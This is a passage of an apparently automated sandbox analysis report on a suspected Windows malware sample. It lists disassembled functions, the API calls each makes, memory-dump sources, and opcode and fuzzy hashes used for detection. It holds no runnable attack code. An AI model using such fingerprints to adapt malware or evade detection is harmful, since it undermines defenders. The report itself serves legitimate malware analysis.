                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: strlen
                                • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                • API String ID: 39653677-4138519520
                                • Opcode ID: 984f2f61aee62bd421f2b2854f3c9e1303d976ffe7db8aec22b12db6bc4cec34
                                • Instruction ID: 9cd6ce351d5159f8c2aa8fae8036f6d0dbfc5210f7352259ff4a18d3748d7b6a
                                • Opcode Fuzzy Hash: 984f2f61aee62bd421f2b2854f3c9e1303d976ffe7db8aec22b12db6bc4cec34
                                • Instruction Fuzzy Hash: 34218E355102898FD722FB35C8547DFF3A7DF80369F85425ACA184BA41E336090AD796
                                Function 003AEB70 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                                Download Yara Rule
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003AEBB4
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AEBE3
                                • lstrcat.KERNEL32(?,00000000), ref: 003AEBF1
                                • lstrcat.KERNEL32(?,00F7F430), ref: 003AEC0C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: 04c82b10dc0d2fc02d74f1859ef8627311e8632b6c13778a0cc913c852097e62
                                • Instruction ID: d2e225385208428da1226ee1b91a698941a32008c27e09fbdcedf7ecf6d3a702
                                • Opcode Fuzzy Hash: 04c82b10dc0d2fc02d74f1859ef8627311e8632b6c13778a0cc913c852097e62
                                • Instruction Fuzzy Hash: 89319572A11519AFCF26EF64DC46FEE73B4FF58300F1104A8BA06AB240DE309E548B94
                                Function 003B2B60 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,003BA3D0,000000FF), ref: 003B2B8F
                                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 003B2B96
                                • GetLocalTime.KERNEL32(?,?,00000000,003BA3D0,000000FF), ref: 003B2BA2
                                • wsprintfA.USER32 ref: 003B2BCE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: 7a4e8e18457b98826d93d1cd9c3d996455a1b1719add9d4ac7fc29c8c6775fb5
                                • Instruction ID: ab218757dbacdf8f7a195d36e351499450dfb3ead9e059ef60f57790e523e2b2
                                • Opcode Fuzzy Hash: 7a4e8e18457b98826d93d1cd9c3d996455a1b1719add9d4ac7fc29c8c6775fb5
                                • Instruction Fuzzy Hash: D20140B2904928ABCB149BC9DD49FBFB7BCFB4CB11F00011AF645A2280E7785544D7B5
                                Function 003B4480 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                                Download Yara Rule
                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000), ref: 003B4492
                                • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 003B44AD
                                • CloseHandle.KERNEL32(00000000), ref: 003B44B4
                                • lstrcpy.KERNEL32(00000000,?), ref: 003B44E7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                • String ID:
                                • API String ID: 4028989146-0
                                • Opcode ID: 2f3ea50ce26ab264f0cfc7de52c457a3b444e0d69d9a8d8f9efd96e3e84c878e
                                • Instruction ID: b5d6e7a26b1215cb1cced5a4d49aa5d772173ad7930d88829af495b8661589b6
                                • Opcode Fuzzy Hash: 2f3ea50ce26ab264f0cfc7de52c457a3b444e0d69d9a8d8f9efd96e3e84c878e
                                • Instruction Fuzzy Hash: EAF0FCB1901A152FE7219B759C4DFEA76A8EF14304F054590FB45D7181DBB08C94C7D4
                                Function 003B8FD1 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 003B8FDD
                                  • Part of subcall function 003B87FF: __amsg_exit.LIBCMT ref: 003B880F
                                • __getptd.LIBCMT ref: 003B8FF4
                                • __amsg_exit.LIBCMT ref: 003B9002
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 003B9026
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: 96b75ddca664ff2450f6ba1b20c767ec2cb7fe7d0f804c6fbc7d71987d73cc2c
                                • Instruction ID: 7382ef1b91c1852ed503088fc8d08e427c3d74ca490a947f613a04ebbdf6d5aa
                                • Opcode Fuzzy Hash: 96b75ddca664ff2450f6ba1b20c767ec2cb7fe7d0f804c6fbc7d71987d73cc2c
                                • Instruction Fuzzy Hash: D6F096329086109BD763BB785807BDD33A4AF0071CF254109F744EEDD2DF645940DB55
                                Function 003B7310 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(------,00395BEB), ref: 003B731B
                                • lstrcpy.KERNEL32(00000000), ref: 003B733F
                                • lstrcat.KERNEL32(?,------), ref: 003B7349
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcatlstrcpylstrlen
                                • String ID: ------
                                • API String ID: 3050337572-882505780
                                • Opcode ID: ffbfe33b99542bcd5adce4a2fb5282e4cd167f21bbc8f942a9d8e689f8494d43
                                • Instruction ID: 9488289cdac4ba77054366cbce53cc747427437eb2843772c1b7ca0718d8041f
                                • Opcode Fuzzy Hash: ffbfe33b99542bcd5adce4a2fb5282e4cd167f21bbc8f942a9d8e689f8494d43
                                • Instruction Fuzzy Hash: 3DF0C978911B029FDB259F35D84C927BAF9EFD4B05319882DA89AC7614EB30D840DB50
                                Function 003A33D0 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391557
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391579
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 0039159B
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 003915FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A3422
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A344B
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A3471
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A3497
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 286358cd93655a3e10d40df424f551a5e2b407f7edc9be95700345855a922953
                                • Instruction ID: 2fc8fbddb68cb4b5a532f3d992dc062a9ae1bf357d0b2dd7cb313882a3584607
                                • Opcode Fuzzy Hash: 286358cd93655a3e10d40df424f551a5e2b407f7edc9be95700345855a922953
                                • Instruction Fuzzy Hash: 1612DC70A016019FDB1ACF19C558B25B7E5EF46718B2EC0ADE809DB3A2D776DD42CB80
                                Function 003A7C20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 003A7C94
                                • std::_Xinvalid_argument.LIBCPMT ref: 003A7CAF
                                  • Part of subcall function 003A7D40: std::_Xinvalid_argument.LIBCPMT ref: 003A7D58
                                  • Part of subcall function 003A7D40: std::_Xinvalid_argument.LIBCPMT ref: 003A7D76
                                  • Part of subcall function 003A7D40: std::_Xinvalid_argument.LIBCPMT ref: 003A7D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: string too long
                                • API String ID: 909987262-2556327735
                                • Opcode ID: 118cadb98ec080921e30d384bc3f09887b3f0638eb5d1e819c483f8e9f6b2714
                                • Instruction ID: c772498fde6478d29b8ae55ce032d06b285169578a41a920402e4112afdb373f
                                • Opcode Fuzzy Hash: 118cadb98ec080921e30d384bc3f09887b3f0638eb5d1e819c483f8e9f6b2714
                                • Instruction Fuzzy Hash: 5D31C7723086149BD736DE6CECC0A6AF7E9EF92770B214A2AF542CB641D7719C4183E4
                                Function 00396EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00396F74
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00396F7B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcess
                                • String ID: @
                                • API String ID: 1357844191-2766056989
                                • Opcode ID: 97031cb450b8b588724c16c9e87565742bfd15846a076a6647bf07765a837ef5
                                • Instruction ID: 27cba75de1d7993b1ec15b31a07c00328078e1fa310dc0421f7f70132bfc90cf
                                • Opcode Fuzzy Hash: 97031cb450b8b588724c16c9e87565742bfd15846a076a6647bf07765a837ef5
                                • Instruction Fuzzy Hash: 68218CB16016019BEB218B24DC86BBA73E8EB51704F448878F986CBA84EB79E945C750
                                Function 003B2400 Relevance: 5.2, APIs: 4, Instructions: 234stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B244C
                                • lstrlen.KERNEL32(00000000), ref: 003B24E9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B2570
                                • lstrlen.KERNEL32(00000000), ref: 003B2577
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 2fb63fa827c1c337578e56a1b0a49fe7c65ad5569ca114d11e5181c8848d2c22
                                • Instruction ID: f008fbc34c3dfcf79511cc891020eed1a8154462e02e428be2c8518c5437d6f7
                                • Opcode Fuzzy Hash: 2fb63fa827c1c337578e56a1b0a49fe7c65ad5569ca114d11e5181c8848d2c22
                                • Instruction Fuzzy Hash: AA81F570E002099FDB25CF95DC44BEFB7B5EF84308F188269E604AB281EB759D46CB90
                                Function 00391530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00391610: lstrcpy.KERNEL32(00000000), ref: 0039162D
                                  • Part of subcall function 00391610: lstrcpy.KERNEL32(00000000,?), ref: 0039164F
                                  • Part of subcall function 00391610: lstrcpy.KERNEL32(00000000,?), ref: 00391671
                                  • Part of subcall function 00391610: lstrcpy.KERNEL32(00000000,?), ref: 00391693
                                • lstrcpy.KERNEL32(00000000,?), ref: 00391557
                                • lstrcpy.KERNEL32(00000000,?), ref: 00391579
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039159B
                                • lstrcpy.KERNEL32(00000000,?), ref: 003915FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
